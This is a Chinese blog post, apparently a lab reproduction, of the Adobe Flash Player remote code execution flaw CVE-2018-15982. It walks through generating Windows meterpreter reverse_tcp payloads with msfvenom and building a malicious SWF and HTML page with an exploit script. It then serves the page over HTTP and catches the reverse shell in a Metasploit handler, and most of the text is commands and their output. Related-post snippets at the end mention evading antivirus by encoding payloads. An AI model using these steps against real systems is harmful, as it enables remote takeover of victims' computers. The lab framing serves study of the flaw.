漏洞实验:CVE-2018-15982-Adobe Flash Player远程代码执行漏洞

最新推荐文章于 2021-05-28 13:24:55 发布
最新推荐文章于 2021-05-28 13:24:55 发布
阅读量435 收藏
点赞数
文章标签: python linux 安全 shell ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486840
版权

漏洞简介

漏洞名称Adobe Flash Player远程代码执行漏洞
威胁类型远程代码执行
威胁等级
漏洞IDCVE-2018-15982
利用场景攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。
受影响系统及应用版本Adobe Flash Player(31.0.0.153及更早的版本)
不受影响影响系统及应用版本Adobe Flash Player 32.0.0.101(修复后的最新版本)
修复及升级地址https://get.adobe.com/flashplayer/

生成msf后门

[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >86.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes

[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes

生成exploit

将msf生成的两个文件86.bin和64.bin放入脚本所在目录下,执行脚本,生成exploit

[email protected]:~/CVE-2018-15982_EXP-master# python CVE_2018_15982.py  -i 86.bin -I 64.bin

[*] Done ! output file --> exploit.swf
[*] Done ! output file --> index.html
[email protected]:~/CVE-2018-15982_EXP-master#

开启本地HTTP服务

利用python自带服务,在脚本当前目录开启HTTP服务

[email protected]:~/CVE-2018-15982_EXP-master# python -m SimpleHTTPServer 8080

开启MSF反弹监听

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf exploit(multi/handler) > set LHOST 192.168.177.148
LHOST => 192.168.177.148
msf exploit(multi/handler) > run

反弹shell

模拟受害者访问HTTP服务,触发漏洞,反弹shell


也许访问后IE会崩溃,未响应

但此时已经成功利用漏洞,反弹shell到msf上了

注意:当浏览器访问的标签页关闭了,反弹的shell也会断开连接
KEY0NE
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现:CVE-2018-15982(Adobe Flash 0day)
RongChun的博客
01-04 632
漏洞概述: 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 受影响的版本: Adobe Flash Player...
CVE-2018-15982 Adobe Flash Player 0day漏洞复现
锋刃科技的博客
01-17 1311
0x00 前言 当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982Adobe Flash Player installer中的高危漏洞CVE-2018-15983。   POC下载地址:https://github.com/B1eed/VulRec/blob/master/CVE-2018-1...
Adobe Flash Player多个远程代码执行漏洞 绿盟科技发布安全威胁通告
weixin_34235135的博客
09-01 152
2016年11月8日(当地时间),Adobe官方网站发布了一个关于Adobe Flash Player产品的安全通告。通告中公布了9个漏洞,涉及到的平台包括Windows,Macintosh,Linux以及Chrome OS。利用这些漏洞时需要被攻击目标访问一个恶意页面或打开一个恶意文件。成功利用这些漏洞后,均可以导致远程代码执行。这9个漏洞的编号如...
漏洞payload 靶机_CVE-2018-15982漏洞复现
weixin_34979632的博客
01-13 291
开篇闲聊:自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash漏洞漏洞概述:受影响的版本:Adobe Flash Player <= 31.0.0.153Adobe Flash Player Installer<= 31.0.0.108不受影响的版本:A...
CVE-2018-4878 flash 漏洞利用教程
凝聚力安全团队
10-25 1437
目录漏洞描述漏洞检测漏洞利用漏洞加固参考链接 漏洞描述 漏洞检测 漏洞利用 漏洞加固 参考链接
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: ...
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修复** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
CVE-2018-4193:CVE-2018-4193的漏洞利用
03-17
**CVE-2018-4193详解:Objective-C框架中的安全漏洞利用** **一、漏洞背景** CVE-2018-4193是2018年发现的一个安全漏洞,主要影响使用Objective-C编程语言的苹果操作系统,包括macOS和iOS。这个漏洞源于Objective-...
CVE-2018-8120:CVE-2018-8120 Windows LPE攻击
05-16
CVE-2018-8120 CVE-2018-8120 Windows LPE攻击 同时支持x32和x64。 经过测试:Win7 x32,Win7 x64,Win2008 x32,Win2008 R2 x32,Win2008 R2 Datacenter x64,Win2008 Enterprise x64。 用法 CVE-2018-8120 ...
CVE-2018-15982 Adobe Flash 0day漏洞复现
a1b2c3是弱口令
12-15 1434
2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 漏洞复现 git clone漏洞poc git clone ...
CVE-2018-15982漏洞复现
weixin_30371875的博客
12-20 160
作者:欧根 漏洞信息:CVE-2018-15982 Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个 关键的 Adobe Flash Player漏洞和一个 重要的 Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限...
漏洞复现】Adobe Flash Player安装程序的漏洞|Flash 0day(CVE-2018-15982)
VI___
01-13 460
一、CVE-2018-15982 ——任意代码执行漏洞 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 ...
成功爬取-CVE-2018-15982漏洞复现【博客园】【1】
HWP
03-14 767
代码: import requests import bs4 from bs4 import BeautifulSoup import re ss = '' headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0...
CVE-2018-15982 flash 0day漏洞分析报告
weixin_33674976的博客
12-14 304
前言本文是这次flash 0day出来之后对这个漏洞的调试报告,文中的大部分都已经发布在核心安全技术博客的综合分析文章上。限于篇幅,原文中没有包含本文中的部分章节,特别是...
【内网学习笔记】7、lcx、netcat和socat的使用
TeamsSix 的 CSDN 空间
05-28 734
1、lcx 使用 lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap Windows 内网端口转发 内网失陷主机 lcx.exe -slave rhost rport lhost lport 公网代理主机 lcx.exe -listen lport1 lport2 内网失陷主机 lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389 公网代理主机 lcx.exe -listen 4444 5555 在建立连接后,访问
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
热门推荐
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
对msf生成的攻击载荷进行免杀处理
Solar's Blog
04-30 3688
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
msfvenom
ss810540895的博客
04-20 2736
在使用最新版msf时 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.70.19 LPORT 4444 -f elf > backdoor.elf 报错如下 [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payl...
CVE-2018-15517
最新发布
06-14
漏洞被标记为“远程代码执行”(Remote Code Execution, RCE),这意味着如果攻击者能够利用这个漏洞,他们可以在用户的计算机上执行任意代码,而无需用户的交互。 这个漏洞存在于Adobe Flash Player的某些版本中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值